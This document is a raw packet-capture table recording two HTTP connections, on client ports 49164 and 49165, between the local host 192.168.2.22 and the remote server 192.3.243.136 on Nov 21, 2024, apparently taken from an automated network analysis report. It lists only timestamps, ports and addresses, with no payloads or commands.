Nov 21, 2024 01:20:37.824173927 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.824228048 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.824266911 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.829039097 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.829099894 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.829150915 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.829197884 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.833949089 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.834017038 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.834045887 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.834084988 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.838826895 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.838937044 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.838988066 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.843693972 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.843847036 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.843904018 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.955578089 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.955614090 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.955682993 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.957554102 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.957667112 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.957724094 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.961385012 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.961482048 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.961534977 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.965140104 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.965256929 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.965327024 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.968991995 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.969093084 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.969151020 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.972666979 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.972759962 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.972814083 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.976293087 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.976394892 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.976449966 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.979938030 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.979999065 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.980041981 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.983511925 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.983576059 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.983597040 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.983658075 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.987117052 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.987242937 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.987304926 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.990735054 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.990761995 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.990819931 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.994318962 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.994451046 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.994508982 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.997926950 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.998054981 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:37.998100042 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:37.998711109 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.001526117 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.001636982 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.001693010 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.005188942 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.005295992 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.005347013 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.008730888 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.008852005 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.008902073 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.012346983 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.012459040 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.012507915 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.015974998 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.016088009 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.016134977 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.019596100 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.019643068 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.019759893 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.019809961 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.023200989 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.023303986 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.023346901 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.026798964 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.026906013 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.026953936 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.029992104 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.030364037 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.030478001 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.030556917 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.034003973 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.034115076 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.034178019 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.037708998 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.037800074 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.037867069 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.041254997 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.041343927 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.041395903 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.044882059 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.045016050 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.045068979 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.075253963 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.075344086 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.075407982 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.077186108 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.077336073 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.077399015 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.080683947 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.083982944 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.156939030 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.157069921 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.157141924 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.158353090 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.158426046 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.158512115 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.158567905 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.161170006 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.161237001 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.161325932 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.164122105 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.164202929 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.164256096 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.166974068 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.167076111 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.167081118 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.167126894 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:38.169666052 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.169796944 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:38.169851065 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:42.338455915 CET	80	49164	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:42.338587999 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:43.283998013 CET	49164	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:45.495816946 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:45.615719080 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:45.615823030 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:45.616123915 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:45.735635042 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890599966 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890631914 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890644073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890661001 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890672922 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890683889 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890687943 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890696049 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890687943 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890687943 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890739918 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890750885 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890770912 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:46.890783072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890783072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890783072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890783072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890783072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890818119 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.890819073 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:46.893435955 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.011028051 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.011099100 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.011115074 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.011173010 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.091929913 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.092089891 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.092227936 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.092283010 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.096060991 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.096122026 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.096173048 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.096230984 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.104446888 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.104506969 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.104553938 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.104600906 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.112894058 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.112955093 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.113018990 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.113078117 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.121274948 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.121325016 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.121376038 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.121428967 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.129682064 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.129792929 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.129806995 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.129841089 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.138094902 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.138160944 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.138204098 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.138257980 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.146455050 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.146545887 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.146554947 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.146604061 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.154881001 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.154956102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.155020952 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.155070066 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.162518978 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.162589073 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.162619114 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.162662029 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.170384884 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.170403957 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.170454025 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.170454025 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.293077946 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.293167114 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.293190956 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.293242931 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.295826912 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.295898914 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.296828985 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.296890020 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.296935081 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.296997070 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.302524090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.302601099 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.302794933 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.308238983 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.308295965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.308346033 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.308401108 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.313754082 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.313827991 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.313857079 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.313911915 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.319406033 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.319484949 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.319500923 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.319555998 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.325160980 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.325227976 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.325318098 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.325382948 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.330766916 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.330835104 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.330908060 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.331020117 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.336417913 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.336483955 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.336498976 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.336554050 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.342065096 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.342128992 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.342138052 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.342199087 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.347676992 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.347752094 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.347774982 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.347835064 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.353348017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.353419065 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.353610039 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.353671074 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.359004021 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.359064102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.359107018 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.359155893 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.364619017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.364681005 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.364728928 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.364785910 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.370256901 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.370338917 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.370388031 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.370434999 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.375916004 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.375977039 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.376022100 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.376070023 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.381562948 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.381632090 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.381671906 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.381724119 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.387170076 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.387227058 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.387273073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.387343884 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.392878056 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.392931938 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.393095970 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.393151045 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.398528099 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.398582935 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.398622036 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.398675919 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.494255066 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.494304895 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.494461060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.496447086 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.496561050 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.496565104 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.496638060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.501028061 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.501086950 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.502625942 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.502690077 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.502758026 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.502816916 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.507154942 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.507229090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.507241964 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.507276058 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.511579990 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.511640072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.511707067 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.511765003 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.515772104 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.515835047 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.515903950 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.515958071 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.520009995 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.520068884 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.520129919 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.520186901 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.524061918 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.524121046 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.524154902 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.524213076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.528219938 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.528291941 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.528332949 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.528379917 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.532342911 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.532402039 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.532459974 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.532519102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.536392927 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.536453009 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.536499023 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.536554098 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.540489912 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.540585995 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.540592909 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.540659904 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.544576883 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.544637918 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.544688940 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.544735909 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.548460007 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.548520088 CET	49165	80	192.168.2.22	192.3.243.136
